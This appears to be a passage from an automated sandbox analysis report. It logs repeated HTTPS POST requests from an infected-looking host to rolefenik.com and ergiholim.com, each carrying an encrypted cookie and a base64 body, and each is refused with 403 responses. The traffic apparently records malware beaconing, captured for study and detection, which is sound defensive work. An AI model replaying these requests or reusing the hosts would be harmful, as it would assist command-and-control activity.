                                                                                                                                          2024-11-13 17:23:45 UTC555INData Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68
                                                                                                                                          Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Ch
                                                                                                                                          2024-11-13 17:23:45 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                          86192.168.2.650083104.21.92.105443
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-13 17:23:46 UTC415OUTPOST /test/ HTTP/1.1
                                                                                                                                          Accept: */*
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Cookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QjdF3ieakfKP7clRUkQ=
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                          Host: rolefenik.com
                                                                                                                                          Content-Length: 92
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          2024-11-13 17:23:46 UTC92OUTData Raw: 79 70 43 67 56 6b 30 79 34 55 71 68 32 33 39 73 38 57 36 4e 38 73 61 39 55 35 75 30 71 53 46 66 39 66 4a 46 64 70 37 56 51 4e 37 52 70 6c 48 4f 52 64 66 2f 39 7a 62 47 43 34 4a 2b 6e 2f 56 63 34 67 47 78 64 57 7a 2b 33 6b 47 51 53 64 69 65 65 51 6f 6d 5a 78 66 41 6b 4b 73 3d
                                                                                                                                          Data Ascii: ypCgVk0y4Uqh239s8W6N8sa9U5u0qSFf9fJFdp7VQN7RplHORdf/9zbGC4J+n/Vc4gGxdWz+3kGQSdieeQomZxfAkKs=
                                                                                                                                          2024-11-13 17:23:46 UTC752INHTTP/1.1 403 Forbidden
                                                                                                                                          Date: Wed, 13 Nov 2024 17:23:46 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mrwjC4qddBdn9lmfRTEMi525y39evnF0SOvFzbYHIAajVi8niqOXj6EwR%2F%2FQcWrhRn4M3L3td%2FKCPI%2B7lLglzIRCvI4X4TexZgi6ADx46Ox8PUNA8bnyIoPiK5ao%2FeWS"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8e2073961ab0795e-NRT
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=142635&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2828&recv_bytes=1167&delivery_rate=20311&cwnd=32&unsent_bytes=0&cid=e149ad309aa58f3d&ts=744&x=0"
                                                                                                                                          2024-11-13 17:23:46 UTC555INData Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68
                                                                                                                                          Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Ch
                                                                                                                                          2024-11-13 17:23:46 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                          87192.168.2.650084104.21.15.162443
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-13 17:23:47 UTC415OUTPOST /test/ HTTP/1.1
                                                                                                                                          Accept: */*
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Cookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QiBY1SuUm/CP68lRUkQ=
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                          Host: ergiholim.com
                                                                                                                                          Content-Length: 92
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          2024-11-13 17:23:47 UTC92OUTData Raw: 79 70 43 67 56 6b 30 79 34 55 71 68 32 33 39 73 38 57 36 4e 38 73 61 39 55 35 75 30 71 53 46 66 39 66 4a 46 64 70 37 56 51 4e 37 52 70 6c 48 4f 52 64 66 2f 39 7a 62 47 43 34 4a 2b 6e 2f 56 63 34 67 47 78 64 57 7a 2b 33 6b 47 51 53 64 69 65 65 51 6f 6d 5a 78 66 41 6b 4b 73 3d
                                                                                                                                          Data Ascii: ypCgVk0y4Uqh239s8W6N8sa9U5u0qSFf9fJFdp7VQN7RplHORdf/9zbGC4J+n/Vc4gGxdWz+3kGQSdieeQomZxfAkKs=
                                                                                                                                          2024-11-13 17:23:48 UTC748INHTTP/1.1 403 Forbidden
                                                                                                                                          Date: Wed, 13 Nov 2024 17:23:48 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MqMvV1Xx4MdMXw%2FU06YO3ZRXAUKVdAdI4g9quOnQhsOwf1UdbLWvLLK3lwBTC29%2FUjL6CaPjeTLRje4MxIQ07sTKoW%2BYWefhp1NiBxd5mtVEq1Hpx87TL6xKhrPSbDbn"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8e2073a01c227346-NRT
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=130070&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2832&recv_bytes=1167&delivery_rate=22263&cwnd=32&unsent_bytes=0&cid=e26b5a25835c5e92&ts=783&x=0"
                                                                                                                                          2024-11-13 17:23:48 UTC555INData Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68
                                                                                                                                          Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Ch
                                                                                                                                          2024-11-13 17:23:48 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                          88192.168.2.650085104.21.92.105443
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-13 17:23:49 UTC415OUTPOST /test/ HTTP/1.1
                                                                                                                                          Accept: */*
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Cookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QjdF3ieakfKP7clRUkQ=
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                          Host: rolefenik.com
                                                                                                                                          Content-Length: 92
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          2024-11-13 17:23:49 UTC92OUTData Raw: 79 70 43 67 56 6b 30 79 34 55 71 68 32 33 39 73 38 57 36 4e 38 73 61 39 55 35 75 30 71 53 46 66 39 66 4a 46 64 70 37 56 51 4e 37 52 70 6c 48 4f 52 64 66 2f 39 7a 62 47 43 34 4a 2b 6e 2f 56 63 34 67 47 78 64 57 7a 2b 33 6b 47 51 53 64 69 65 65 51 6f 6d 5a 78 66 41 6b 4b 73 3d
                                                                                                                                          Data Ascii: ypCgVk0y4Uqh239s8W6N8sa9U5u0qSFf9fJFdp7VQN7RplHORdf/9zbGC4J+n/Vc4gGxdWz+3kGQSdieeQomZxfAkKs=
                                                                                                                                          2024-11-13 17:23:49 UTC755INHTTP/1.1 403 Forbidden
                                                                                                                                          Date: Wed, 13 Nov 2024 17:23:49 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xAl5KbUg4duCxs8%2FGiy1oqHjkB4Jzqwv7GEtknhFs8FEKmdncIp3fysdL2r%2BRm2lzdVN8%2BxGTmkOiVnA8UKo%2BQXmTNmRQQZd%2BKfQ0wVDNCLeq8fOml%2BinkPHFVILZ4da"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8e2073a8d8086b27-DFW
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1141&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2828&recv_bytes=1167&delivery_rate=2592658&cwnd=249&unsent_bytes=0&cid=cc97e5480558a86b&ts=464&x=0"
                                                                                                                                          2024-11-13 17:23:49 UTC555INData Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68
                                                                                                                                          Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Ch
                                                                                                                                          2024-11-13 17:23:49 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                          89192.168.2.650086104.21.15.162443
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-13 17:23:50 UTC415OUTPOST /test/ HTTP/1.1
                                                                                                                                          Accept: */*
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Cookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QiBY1SuUm/CP68lRUkQ=
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                          Host: ergiholim.com
                                                                                                                                          Content-Length: 92
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          2024-11-13 17:23:50 UTC92OUTData Raw: 79 70 43 67 56 6b 30 79 34 55 71 68 32 33 39 73 38 57 36 4e 38 73 61 39 55 35 75 30 71 53 46 66 39 66 4a 46 64 70 37 56 51 4e 37 52 70 6c 48 4f 52 64 66 2f 39 7a 62 47 43 34 4a 2b 6e 2f 56 63 34 67 47 78 64 57 7a 2b 33 6b 47 51 53 64 69 65 65 51 6f 6d 5a 78 66 41 6b 4b 73 3d
                                                                                                                                          Data Ascii: ypCgVk0y4Uqh239s8W6N8sa9U5u0qSFf9fJFdp7VQN7RplHORdf/9zbGC4J+n/Vc4gGxdWz+3kGQSdieeQomZxfAkKs=
                                                                                                                                          2024-11-13 17:23:51 UTC756INHTTP/1.1 403 Forbidden
                                                                                                                                          Date: Wed, 13 Nov 2024 17:23:51 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Wcpvqb%2B9Ciq85jJZe3uw%2F1n0c8Ow0Wlk6izM0ey5IDLfNm%2BtN0Mxcd1DwjWu3kDkG2v%2BW0tlHqgbQJ4koeWCoY%2FKO3aNrXRr%2Fg8lBlGCUVb90qC2HY9euM6W%2B0W5aFB4"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8e2073b14fd86879-NRT
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=135700&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2831&recv_bytes=1167&delivery_rate=21335&cwnd=32&unsent_bytes=0&cid=25dfbc323f69631a&ts=785&x=0"
                                                                                                                                          2024-11-13 17:23:51 UTC555INData Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68
                                                                                                                                          Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Ch
                                                                                                                                          2024-11-13 17:23:51 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                          90192.168.2.650087104.21.92.105443
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-13 17:23:52 UTC415OUTPOST /test/ HTTP/1.1
                                                                                                                                          Accept: */*
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Cookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QjdF3ieakfKP7clRUkQ=
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                          Host: rolefenik.com
                                                                                                                                          Content-Length: 92
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          2024-11-13 17:23:52 UTC92OUTData Raw: 79 70 43 67 56 6b 30 79 34 55 71 68 32 33 39 73 38 57 36 4e 38 73 61 39 55 35 75 30 71 53 46 66 39 66 4a 46 64 70 37 56 51 4e 37 52 70 6c 48 4f 52 64 66 2f 39 7a 62 47 43 34 4a 2b 6e 2f 56 63 34 67 47 78 64 57 7a 2b 33 6b 47 51 53 64 69 65 65 51 6f 6d 5a 78 66 41 6b 4b 73 3d
                                                                                                                                          Data Ascii: ypCgVk0y4Uqh239s8W6N8sa9U5u0qSFf9fJFdp7VQN7RplHORdf/9zbGC4J+n/Vc4gGxdWz+3kGQSdieeQomZxfAkKs=
                                                                                                                                          2024-11-13 17:23:52 UTC744INHTTP/1.1 403 Forbidden
                                                                                                                                          Date: Wed, 13 Nov 2024 17:23:52 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fVmTE6zhwtZ7xpN7DSa5mKLD4zOVhUdVy1Pggz3lXJQv9ScAn6TtSF9PgD5l82zP8udsHBCXy2xs%2BtDMcLc4Rq0GJ79UI7euTUuITHdbrKNmVZFR6QfRFkktoAWz3Jwz"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8e2073bc6b1ad78b-NRT
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=135673&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2829&recv_bytes=1167&delivery_rate=20600&cwnd=32&unsent_bytes=0&cid=e24d933cc66df834&ts=506&x=0"
                                                                                                                                          2024-11-13 17:23:52 UTC555INData Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68
                                                                                                                                          Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Ch
                                                                                                                                          2024-11-13 17:23:52 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                          91192.168.2.650088104.21.15.162443
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-13 17:23:53 UTC415OUTPOST /test/ HTTP/1.1
                                                                                                                                          Accept: */*
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Cookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QiBY1SuUm/CP68lRUkQ=
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                          Host: ergiholim.com
                                                                                                                                          Content-Length: 92
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          2024-11-13 17:23:53 UTC92OUTData Raw: 79 70 43 67 56 6b 30 79 34 55 71 68 32 33 39 73 38 57 36 4e 38 73 61 39 55 35 75 30 71 53 46 66 39 66 4a 46 64 70 37 56 51 4e 37 52 70 6c 48 4f 52 64 66 2f 39 7a 62 47 43 34 4a 2b 6e 2f 56 63 34 67 47 78 64 57 7a 2b 33 6b 47 51 53 64 69 65 65 51 6f 6d 5a 78 66 41 6b 4b 73 3d
                                                                                                                                          Data Ascii: ypCgVk0y4Uqh239s8W6N8sa9U5u0qSFf9fJFdp7VQN7RplHORdf/9zbGC4J+n/Vc4gGxdWz+3kGQSdieeQomZxfAkKs=
                                                                                                                                          2024-11-13 17:23:54 UTC750INHTTP/1.1 403 Forbidden
                                                                                                                                          Date: Wed, 13 Nov 2024 17:23:54 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5%2BvFuXqEt%2FXb6WqxKfA8h%2FFhirw84zY0xUgHMXVA04aPRbKDYZHi0GyLOJdog2z1nqO6YEG05T8EIlXDjw4t6OL3rP1BCfG%2BMIDk9qS4zJD9X4tBkQQLUodINOTa9jTj"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8e2073c52d517368-NRT
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=135254&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2831&recv_bytes=1167&delivery_rate=18139&cwnd=32&unsent_bytes=0&cid=94a472d9aea34c11&ts=564&x=0"
                                                                                                                                          2024-11-13 17:23:54 UTC555INData Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68
                                                                                                                                          Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Ch
                                                                                                                                          2024-11-13 17:23:54 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                          92192.168.2.650089104.21.92.105443
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-13 17:23:54 UTC415OUTPOST /test/ HTTP/1.1
                                                                                                                                          Accept: */*
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Cookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QjdF3ieakfKP7clRUkQ=
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                          Host: rolefenik.com
                                                                                                                                          Content-Length: 92
                                                                                                                                          Cache-Control: no-cache
